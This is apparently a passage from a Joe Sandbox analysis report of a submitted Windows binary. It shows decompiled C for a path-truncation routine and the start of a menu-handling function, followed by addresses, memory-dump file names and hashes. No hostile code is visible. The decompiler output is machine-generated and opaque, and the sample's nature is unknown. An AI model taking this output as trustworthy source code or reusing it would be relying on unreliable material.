                                                                                                                                                                                                                                                                                          				signed int _t84;
                                                                                                                                                                                                                                                                                          				void* _t88;
                                                                                                                                                                                                                                                                                          				void* _t102;
                                                                                                                                                                                                                                                                                          				signed int _t104;
                                                                                                                                                                                                                                                                                          				signed int _t105;
                                                                                                                                                                                                                                                                                          				CHAR* _t119;
                                                                                                                                                                                                                                                                                          				CHAR* _t120;
                                                                                                                                                                                                                                                                                          				CHAR* _t121;
                                                                                                                                                                                                                                                                                          				char _t124;
                                                                                                                                                                                                                                                                                          				char _t125;
                                                                                                                                                                                                                                                                                          				intOrPtr _t126;
                                                                                                                                                                                                                                                                                          				char _t132;
                                                                                                                                                                                                                                                                                          				char _t135;
                                                                                                                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                                                                                                                          				char* _t146;
                                                                                                                                                                                                                                                                                          				intOrPtr _t147;
                                                                                                                                                                                                                                                                                          				void* _t148;
                                                                                                                                                                                                                                                                                          				intOrPtr _t149;
                                                                                                                                                                                                                                                                                          				void* _t150;
                                                                                                                                                                                                                                                                                          				signed int _t152;
                                                                                                                                                                                                                                                                                          				signed int _t153;
                                                                                                                                                                                                                                                                                          				void* _t154;
                                                                                                                                                                                                                                                                                          				signed int _t159;
                                                                                                                                                                                                                                                                                          				intOrPtr _t161;
                                                                                                                                                                                                                                                                                          				void* _t164;
                                                                                                                                                                                                                                                                                          				void* _t165;
                                                                                                                                                                                                                                                                                          				void* _t166;
                                                                                                                                                                                                                                                                                          				signed int _t167;
                                                                                                                                                                                                                                                                                          				void* _t168;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t119 = __eax;
                                                                                                                                                                                                                                                                                          				_t73 = lstrlenA(__eax);
                                                                                                                                                                                                                                                                                          				_t147 = _a8;
                                                                                                                                                                                                                                                                                          				if(_t73 >= _t147) {
                                                                                                                                                                                                                                                                                          					 *_a4 = 0;
                                                                                                                                                                                                                                                                                          					_t124 =  *_t119;
                                                                                                                                                                                                                                                                                          					_v5 = 0x5c;
                                                                                                                                                                                                                                                                                          					_t74 = _t119;
                                                                                                                                                                                                                                                                                          					while(_t124 != 0) {
                                                                                                                                                                                                                                                                                          						if(_t124 == 0x2f || _t124 == 0x5c) {
                                                                                                                                                                                                                                                                                          							_v5 = _t124;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t74 = CharNextA(_t74);
                                                                                                                                                                                                                                                                                          						_t124 =  *_t74;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t125 =  *_t119;
                                                                                                                                                                                                                                                                                          					_v16 = _t119;
                                                                                                                                                                                                                                                                                          					_t75 = _t119;
                                                                                                                                                                                                                                                                                          					while(_t125 != 0) {
                                                                                                                                                                                                                                                                                          						if(_t125 == 0x5c || _t125 == 0x3a || _t125 == 0x2f) {
                                                                                                                                                                                                                                                                                          							_t135 = _t75[1];
                                                                                                                                                                                                                                                                                          							_t146 =  &(_t75[1]);
                                                                                                                                                                                                                                                                                          							if(_t135 != 0 && _t135 != 0x5c && _t135 != 0x2f) {
                                                                                                                                                                                                                                                                                          								_v16 = _t146;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t75 = CharNextA(_t75);
                                                                                                                                                                                                                                                                                          						_t125 =  *_t75;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t76 = lstrlenA(_v16);
                                                                                                                                                                                                                                                                                          					_v20 = _t76;
                                                                                                                                                                                                                                                                                          					if(_v16 != _t119 || _t147 <= 3) {
                                                                                                                                                                                                                                                                                          						if(_t147 >= 7) {
                                                                                                                                                                                                                                                                                          							_t159 = _t147 - _t76 - 5;
                                                                                                                                                                                                                                                                                          							if(_t159 >= 0) {
                                                                                                                                                                                                                                                                                          								if(_t159 > 0) {
                                                                                                                                                                                                                                                                                          									_t153 = _t159;
                                                                                                                                                                                                                                                                                          									while(IsDBCSLeadByte(_t119[_t153 - 1] & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          										_t153 = _t153 - 1;
                                                                                                                                                                                                                                                                                          										if(_t153 > 0) {
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									if((_t159 - _t153 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                          										_t159 = _t159 - 1;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t159 = 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t126 = _a8;
                                                                                                                                                                                                                                                                                          							_t148 = 0;
                                                                                                                                                                                                                                                                                          							_t77 = _t159;
                                                                                                                                                                                                                                                                                          							if(_t126 == 0) {
                                                                                                                                                                                                                                                                                          								goto L61;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if(_t159 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          									if(_t126 > _t159) {
                                                                                                                                                                                                                                                                                          										goto L60;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										 *_a4 = 0;
                                                                                                                                                                                                                                                                                          										goto L61;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t152 = _t126 - 1;
                                                                                                                                                                                                                                                                                          									if(_t152 >= lstrlenA(_t119)) {
                                                                                                                                                                                                                                                                                          										_t77 = lstrlenA(_t119);
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t77 = _t152;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t148 = 0x50;
                                                                                                                                                                                                                                                                                          									L60:
                                                                                                                                                                                                                                                                                          									_t77 = lstrcpynA(_a4, _t119, _t77 + 1);
                                                                                                                                                                                                                                                                                          									if(_t77 == 0) {
                                                                                                                                                                                                                                                                                          										L61:
                                                                                                                                                                                                                                                                                          										_t148 = 0x16;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t78 = _t77 & 0xffffff00 | _t148 == 0x00000000;
                                                                                                                                                                                                                                                                                          							_v6 = _t78;
                                                                                                                                                                                                                                                                                          							if(_t78 != 0) {
                                                                                                                                                                                                                                                                                          								_t79 = lstrlenA("...");
                                                                                                                                                                                                                                                                                          								_t149 = _a8;
                                                                                                                                                                                                                                                                                          								if(_t149 > _t79) {
                                                                                                                                                                                                                                                                                          									lstrcatA(_a4, "...");
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v12 = _v5;
                                                                                                                                                                                                                                                                                          								_v11 = 0;
                                                                                                                                                                                                                                                                                          								if(_t149 > lstrlenA( &_v12)) {
                                                                                                                                                                                                                                                                                          									lstrcatA(_a4,  &_v12);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if(_t149 <= _v20 + 4) {
                                                                                                                                                                                                                                                                                          									_t150 = _t149 + 0xfffffff8;
                                                                                                                                                                                                                                                                                          									if(_t150 > 0) {
                                                                                                                                                                                                                                                                                          										_t88 = E000F6000(_t150, _v16);
                                                                                                                                                                                                                                                                                          										_t168 = _t168 + 4;
                                                                                                                                                                                                                                                                                          										if(_t88 != 0) {
                                                                                                                                                                                                                                                                                          											_t150 = _t150 - 1;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t120 = _a4;
                                                                                                                                                                                                                                                                                          									_t161 = _a8;
                                                                                                                                                                                                                                                                                          									_t84 = E000F4910(_t150, _t161 - 4, _v16,  &(_t120[4])) & 0xffffff00 | _t83 == 0x00000000;
                                                                                                                                                                                                                                                                                          									_v6 = _t84;
                                                                                                                                                                                                                                                                                          									if(_t84 != 0 && _t161 > lstrlenA("...")) {
                                                                                                                                                                                                                                                                                          										lstrcatA(_t120, "...");
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L80;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t121 = _v16;
                                                                                                                                                                                                                                                                                          									if(_t149 <= lstrlenA(_t121)) {
                                                                                                                                                                                                                                                                                          										goto L80;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										lstrcatA(_a4, _t121);
                                                                                                                                                                                                                                                                                          										return _v6;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								return _t78;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t164 = _t147 - 1;
                                                                                                                                                                                                                                                                                          							_t102 = 0;
                                                                                                                                                                                                                                                                                          							if(_t164 > 0) {
                                                                                                                                                                                                                                                                                          								do {
                                                                                                                                                                                                                                                                                          									_t132 = _v5;
                                                                                                                                                                                                                                                                                          									_t33 = _t102 + 1; // 0x1
                                                                                                                                                                                                                                                                                          									_t143 = _t33;
                                                                                                                                                                                                                                                                                          									if(_t143 != 4) {
                                                                                                                                                                                                                                                                                          										_t132 = 0x2e;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									 *((char*)(_t102 + _a4)) = _t132;
                                                                                                                                                                                                                                                                                          									_t102 = _t143;
                                                                                                                                                                                                                                                                                          								} while (_t102 < _t164);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_a4[_t147 - 1] = 0;
                                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t165 = 0;
                                                                                                                                                                                                                                                                                          						_t104 = _t147 - 4;
                                                                                                                                                                                                                                                                                          						if(_t147 == 0) {
                                                                                                                                                                                                                                                                                          							L28:
                                                                                                                                                                                                                                                                                          							_t165 = 0x16;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							if(_t104 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          								if(_t147 > _t104) {
                                                                                                                                                                                                                                                                                          									goto L27;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t104 = _a4;
                                                                                                                                                                                                                                                                                          									 *_t104 = 0;
                                                                                                                                                                                                                                                                                          									goto L28;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t167 = _t147 - 1;
                                                                                                                                                                                                                                                                                          								if(_t167 >= lstrlenA(_t119)) {
                                                                                                                                                                                                                                                                                          									_t104 = lstrlenA(_t119);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t104 = _t167;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t165 = 0x50;
                                                                                                                                                                                                                                                                                          								L27:
                                                                                                                                                                                                                                                                                          								_t104 = lstrcpynA(_a4, _t119, _t104 + 1);
                                                                                                                                                                                                                                                                                          								if(_t104 == 0) {
                                                                                                                                                                                                                                                                                          									goto L28;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t105 = _t104 & 0xffffff00 | _t165 == 0x00000000;
                                                                                                                                                                                                                                                                                          						_v6 = _t105;
                                                                                                                                                                                                                                                                                          						if(_t105 == 0) {
                                                                                                                                                                                                                                                                                          							L80:
                                                                                                                                                                                                                                                                                          							return _v6;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t154 = _t147 + 0xfffffffd;
                                                                                                                                                                                                                                                                                          							_t166 = _t154;
                                                                                                                                                                                                                                                                                          							if(_t154 > 0) {
                                                                                                                                                                                                                                                                                          								while(IsDBCSLeadByte(_t119[_t166 - 1] & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          									_t166 = _t166 - 1;
                                                                                                                                                                                                                                                                                          									if(_t166 > 0) {
                                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if((_t154 - _t166 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                          									_a4[_a8 - 4] = 0;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							if(_a8 <= lstrlenA("...")) {
                                                                                                                                                                                                                                                                                          								goto L80;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								lstrcatA(_a4, "...");
                                                                                                                                                                                                                                                                                          								return _v6;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if(_t147 > lstrlenA(_t119)) {
                                                                                                                                                                                                                                                                                          						lstrcpyA(_a4, _t119);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}














































                                                                                                                                                                                                                                                                                          0x000f604f
                                                                                                                                                                                                                                                                                          0x000f6052
                                                                                                                                                                                                                                                                                          0x000f6054
                                                                                                                                                                                                                                                                                          0x000f6059
                                                                                                                                                                                                                                                                                          0x000f607f
                                                                                                                                                                                                                                                                                          0x000f6082
                                                                                                                                                                                                                                                                                          0x000f6084
                                                                                                                                                                                                                                                                                          0x000f6088
                                                                                                                                                                                                                                                                                          0x000f608c
                                                                                                                                                                                                                                                                                          0x000f6093
                                                                                                                                                                                                                                                                                          0x000f609a
                                                                                                                                                                                                                                                                                          0x000f609a
                                                                                                                                                                                                                                                                                          0x000f609e
                                                                                                                                                                                                                                                                                          0x000f60a0
                                                                                                                                                                                                                                                                                          0x000f60a2
                                                                                                                                                                                                                                                                                          0x000f60a6
                                                                                                                                                                                                                                                                                          0x000f60a8
                                                                                                                                                                                                                                                                                          0x000f60ab
                                                                                                                                                                                                                                                                                          0x000f60af
                                                                                                                                                                                                                                                                                          0x000f60b4
                                                                                                                                                                                                                                                                                          0x000f60c0
                                                                                                                                                                                                                                                                                          0x000f60c3
                                                                                                                                                                                                                                                                                          0x000f60c8
                                                                                                                                                                                                                                                                                          0x000f60d4
                                                                                                                                                                                                                                                                                          0x000f60d4
                                                                                                                                                                                                                                                                                          0x000f60c8
                                                                                                                                                                                                                                                                                          0x000f60d8
                                                                                                                                                                                                                                                                                          0x000f60da
                                                                                                                                                                                                                                                                                          0x000f60dc
                                                                                                                                                                                                                                                                                          0x000f60e4
                                                                                                                                                                                                                                                                                          0x000f60ea
                                                                                                                                                                                                                                                                                          0x000f60f0
                                                                                                                                                                                                                                                                                          0x000f61cb
                                                                                                                                                                                                                                                                                          0x000f6204
                                                                                                                                                                                                                                                                                          0x000f6207
                                                                                                                                                                                                                                                                                          0x000f620f
                                                                                                                                                                                                                                                                                          0x000f6211
                                                                                                                                                                                                                                                                                          0x000f6213
                                                                                                                                                                                                                                                                                          0x000f6223
                                                                                                                                                                                                                                                                                          0x000f6226
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f6226
                                                                                                                                                                                                                                                                                          0x000f622e
                                                                                                                                                                                                                                                                                          0x000f6230
                                                                                                                                                                                                                                                                                          0x000f6230
                                                                                                                                                                                                                                                                                          0x000f622e
                                                                                                                                                                                                                                                                                          0x000f6209
                                                                                                                                                                                                                                                                                          0x000f6209
                                                                                                                                                                                                                                                                                          0x000f6209
                                                                                                                                                                                                                                                                                          0x000f6231
                                                                                                                                                                                                                                                                                          0x000f6234
                                                                                                                                                                                                                                                                                          0x000f6236
                                                                                                                                                                                                                                                                                          0x000f623a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f623c
                                                                                                                                                                                                                                                                                          0x000f623f
                                                                                                                                                                                                                                                                                          0x000f628e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f6290
                                                                                                                                                                                                                                                                                          0x000f6293
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f6293
                                                                                                                                                                                                                                                                                          0x000f6241
                                                                                                                                                                                                                                                                                          0x000f6248
                                                                                                                                                                                                                                                                                          0x000f624f
                                                                                                                                                                                                                                                                                          0x000f6256
                                                                                                                                                                                                                                                                                          0x000f6251
                                                                                                                                                                                                                                                                                          0x000f6251
                                                                                                                                                                                                                                                                                          0x000f6251
                                                                                                                                                                                                                                                                                          0x000f6258
                                                                                                                                                                                                                                                                                          0x000f625d
                                                                                                                                                                                                                                                                                          0x000f6264
                                                                                                                                                                                                                                                                                          0x000f626c
                                                                                                                                                                                                                                                                                          0x000f626e
                                                                                                                                                                                                                                                                                          0x000f626e
                                                                                                                                                                                                                                                                                          0x000f626e
                                                                                                                                                                                                                                                                                          0x000f626c
                                                                                                                                                                                                                                                                                          0x000f623f
                                                                                                                                                                                                                                                                                          0x000f6275
                                                                                                                                                                                                                                                                                          0x000f6278
                                                                                                                                                                                                                                                                                          0x000f627d
                                                                                                                                                                                                                                                                                          0x000f62a5
                                                                                                                                                                                                                                                                                          0x000f62a7
                                                                                                                                                                                                                                                                                          0x000f62ac
                                                                                                                                                                                                                                                                                          0x000f62b7
                                                                                                                                                                                                                                                                                          0x000f62b7
                                                                                                                                                                                                                                                                                          0x000f62c4
                                                                                                                                                                                                                                                                                          0x000f62c7
                                                                                                                                                                                                                                                                                          0x000f62cf
                                                                                                                                                                                                                                                                                          0x000f62d9
                                                                                                                                                                                                                                                                                          0x000f62d9
                                                                                                                                                                                                                                                                                          0x000f62e7
                                                                                                                                                                                                                                                                                          0x000f6308
                                                                                                                                                                                                                                                                                          0x000f630d
                                                                                                                                                                                                                                                                                          0x000f6313
                                                                                                                                                                                                                                                                                          0x000f6318
                                                                                                                                                                                                                                                                                          0x000f631d
                                                                                                                                                                                                                                                                                          0x000f631f
                                                                                                                                                                                                                                                                                          0x000f631f
                                                                                                                                                                                                                                                                                          0x000f631d
                                                                                                                                                                                                                                                                                          0x000f6320
                                                                                                                                                                                                                                                                                          0x000f6323
                                                                                                                                                                                                                                                                                          0x000f633c
                                                                                                                                                                                                                                                                                          0x000f633f
                                                                                                                                                                                                                                                                                          0x000f6344
                                                                                                                                                                                                                                                                                          0x000f635b
                                                                                                                                                                                                                                                                                          0x000f635b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f62e9
                                                                                                                                                                                                                                                                                          0x000f62e9
                                                                                                                                                                                                                                                                                          0x000f62f1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f62f3
                                                                                                                                                                                                                                                                                          0x000f62f8
                                                                                                                                                                                                                                                                                          0x000f6307
                                                                                                                                                                                                                                                                                          0x000f6307
                                                                                                                                                                                                                                                                                          0x000f62f1
                                                                                                                                                                                                                                                                                          0x000f6285
                                                                                                                                                                                                                                                                                          0x000f6285
                                                                                                                                                                                                                                                                                          0x000f6285
                                                                                                                                                                                                                                                                                          0x000f61cd
                                                                                                                                                                                                                                                                                          0x000f61cd
                                                                                                                                                                                                                                                                                          0x000f61d0
                                                                                                                                                                                                                                                                                          0x000f61d4
                                                                                                                                                                                                                                                                                          0x000f61d6
                                                                                                                                                                                                                                                                                          0x000f61d6
                                                                                                                                                                                                                                                                                          0x000f61d9
                                                                                                                                                                                                                                                                                          0x000f61d9
                                                                                                                                                                                                                                                                                          0x000f61df
                                                                                                                                                                                                                                                                                          0x000f61e1
                                                                                                                                                                                                                                                                                          0x000f61e1
                                                                                                                                                                                                                                                                                          0x000f61e6
                                                                                                                                                                                                                                                                                          0x000f61e9
                                                                                                                                                                                                                                                                                          0x000f61eb
                                                                                                                                                                                                                                                                                          0x000f61d6
                                                                                                                                                                                                                                                                                          0x000f61f2
                                                                                                                                                                                                                                                                                          0x000f61ff
                                                                                                                                                                                                                                                                                          0x000f61ff
                                                                                                                                                                                                                                                                                          0x000f60ff
                                                                                                                                                                                                                                                                                          0x000f60ff
                                                                                                                                                                                                                                                                                          0x000f6101
                                                                                                                                                                                                                                                                                          0x000f6106
                                                                                                                                                                                                                                                                                          0x000f6140
                                                                                                                                                                                                                                                                                          0x000f6140
                                                                                                                                                                                                                                                                                          0x000f6108
                                                                                                                                                                                                                                                                                          0x000f610b
                                                                                                                                                                                                                                                                                          0x000f61b7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f61bd
                                                                                                                                                                                                                                                                                          0x000f61bd
                                                                                                                                                                                                                                                                                          0x000f61c0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f61c0
                                                                                                                                                                                                                                                                                          0x000f6111
                                                                                                                                                                                                                                                                                          0x000f6112
                                                                                                                                                                                                                                                                                          0x000f611d
                                                                                                                                                                                                                                                                                          0x000f6124
                                                                                                                                                                                                                                                                                          0x000f611f
                                                                                                                                                                                                                                                                                          0x000f611f
                                                                                                                                                                                                                                                                                          0x000f611f
                                                                                                                                                                                                                                                                                          0x000f612a
                                                                                                                                                                                                                                                                                          0x000f612f
                                                                                                                                                                                                                                                                                          0x000f6136
                                                                                                                                                                                                                                                                                          0x000f613e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f613e
                                                                                                                                                                                                                                                                                          0x000f610b
                                                                                                                                                                                                                                                                                          0x000f6147
                                                                                                                                                                                                                                                                                          0x000f614a
                                                                                                                                                                                                                                                                                          0x000f614f
                                                                                                                                                                                                                                                                                          0x000f6361
                                                                                                                                                                                                                                                                                          0x000f636a
                                                                                                                                                                                                                                                                                          0x000f6155
                                                                                                                                                                                                                                                                                          0x000f6155
                                                                                                                                                                                                                                                                                          0x000f6158
                                                                                                                                                                                                                                                                                          0x000f615c
                                                                                                                                                                                                                                                                                          0x000f6160
                                                                                                                                                                                                                                                                                          0x000f6170
                                                                                                                                                                                                                                                                                          0x000f6173
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f6173
                                                                                                                                                                                                                                                                                          0x000f617b
                                                                                                                                                                                                                                                                                          0x000f6183
                                                                                                                                                                                                                                                                                          0x000f6183
                                                                                                                                                                                                                                                                                          0x000f617b
                                                                                                                                                                                                                                                                                          0x000f6196
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f619c
                                                                                                                                                                                                                                                                                          0x000f61a5
                                                                                                                                                                                                                                                                                          0x000f61b4
                                                                                                                                                                                                                                                                                          0x000f61b4
                                                                                                                                                                                                                                                                                          0x000f6196
                                                                                                                                                                                                                                                                                          0x000f614f
                                                                                                                                                                                                                                                                                          0x000f605b
                                                                                                                                                                                                                                                                                          0x000f6060
                                                                                                                                                                                                                                                                                          0x000f6067
                                                                                                                                                                                                                                                                                          0x000f6067
                                                                                                                                                                                                                                                                                          0x000f6075
                                                                                                                                                                                                                                                                                          0x000f6075

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$CharNext$ByteLeadlstrcatlstrcpylstrcpyn
                                                                                                                                                                                                                                                                                          • String ID: ...$\
                                                                                                                                                                                                                                                                                          • API String ID: 2258621147-1507338726
                                                                                                                                                                                                                                                                                          • Opcode ID: 47aa5fa118d3c47eb17b7896d67358362d9126a4222d635953f7e8c06fe5c94c
                                                                                                                                                                                                                                                                                          • Instruction ID: 9148b86f6f5477c5ebc0621ad738624d94ec1f6232b9e86282a16e704764e6a8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47aa5fa118d3c47eb17b7896d67358362d9126a4222d635953f7e8c06fe5c94c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7A17936E0022DABCF618B78CC846FE7BE5AF88354F188151EE149BB42DB379D459790
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                          			E00100060(struct HMENU__** __ecx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v211;
                                                                                                                                                                                                                                                                                          				char _v212;
                                                                                                                                                                                                                                                                                          				int _v216;
                                                                                                                                                                                                                                                                                          				int _v220;
                                                                                                                                                                                                                                                                                          				signed int _v224;
                                                                                                                                                                                                                                                                                          				int _v228;
                                                                                                                                                                                                                                                                                          				void* _v232;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v236;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v240;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v244;
                                                                                                                                                                                                                                                                                          				void* _v248;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v264;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v268;
                                                                                                                                                                                                                                                                                          				int _v272;
                                                                                                                                                                                                                                                                                          				struct HMENU__** _v276;
                                                                                                                                                                                                                                                                                          				long _v280;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v284;
                                                                                                                                                                                                                                                                                          				int _v288;
                                                                                                                                                                                                                                                                                          				CHAR* _v292;
                                                                                                                                                                                                                                                                                          				int _v296;
                                                                                                                                                                                                                                                                                          				int _v300;
                                                                                                                                                                                                                                                                                          				int _v304;
                                                                                                                                                                                                                                                                                          				int _v308;
                                                                                                                                                                                                                                                                                          				int _v312;
                                                                                                                                                                                                                                                                                          				void* _v316;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v364;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v412;
                                                                                                                                                                                                                                                                                          				char _v440;
                                                                                                                                                                                                                                                                                          				char _v444;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t93;
                                                                                                                                                                                                                                                                                          				struct HWND__** _t97;
                                                                                                                                                                                                                                                                                          				long _t100;
                                                                                                                                                                                                                                                                                          				long _t103;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t104;
                                                                                                                                                                                                                                                                                          				signed char _t117;
                                                                                                                                                                                                                                                                                          				int _t124;
                                                                                                                                                                                                                                                                                          				signed char _t139;
                                                                                                                                                                                                                                                                                          				long _t143;
                                                                                                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t168;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t169;
                                                                                                                                                                                                                                                                                          				int _t170;
                                                                                                                                                                                                                                                                                          				CHAR* _t171;
                                                                                                                                                                                                                                                                                          				signed int _t172;
                                                                                                                                                                                                                                                                                          				void* _t173;
                                                                                                                                                                                                                                                                                          				void* _t174;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t93 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t93 ^ _t172;
                                                                                                                                                                                                                                                                                          				_t169 = __ecx;
                                                                                                                                                                                                                                                                                          				_v276 = __ecx;
                                                                                                                                                                                                                                                                                          				_v444 = 0x50;
                                                                                                                                                                                                                                                                                          				E00106820( &_v440, 0, 0x4c);
                                                                                                                                                                                                                                                                                          				_t97 =  *(_t169 + 4);
                                                                                                                                                                                                                                                                                          				_t139 = SendMessageA;
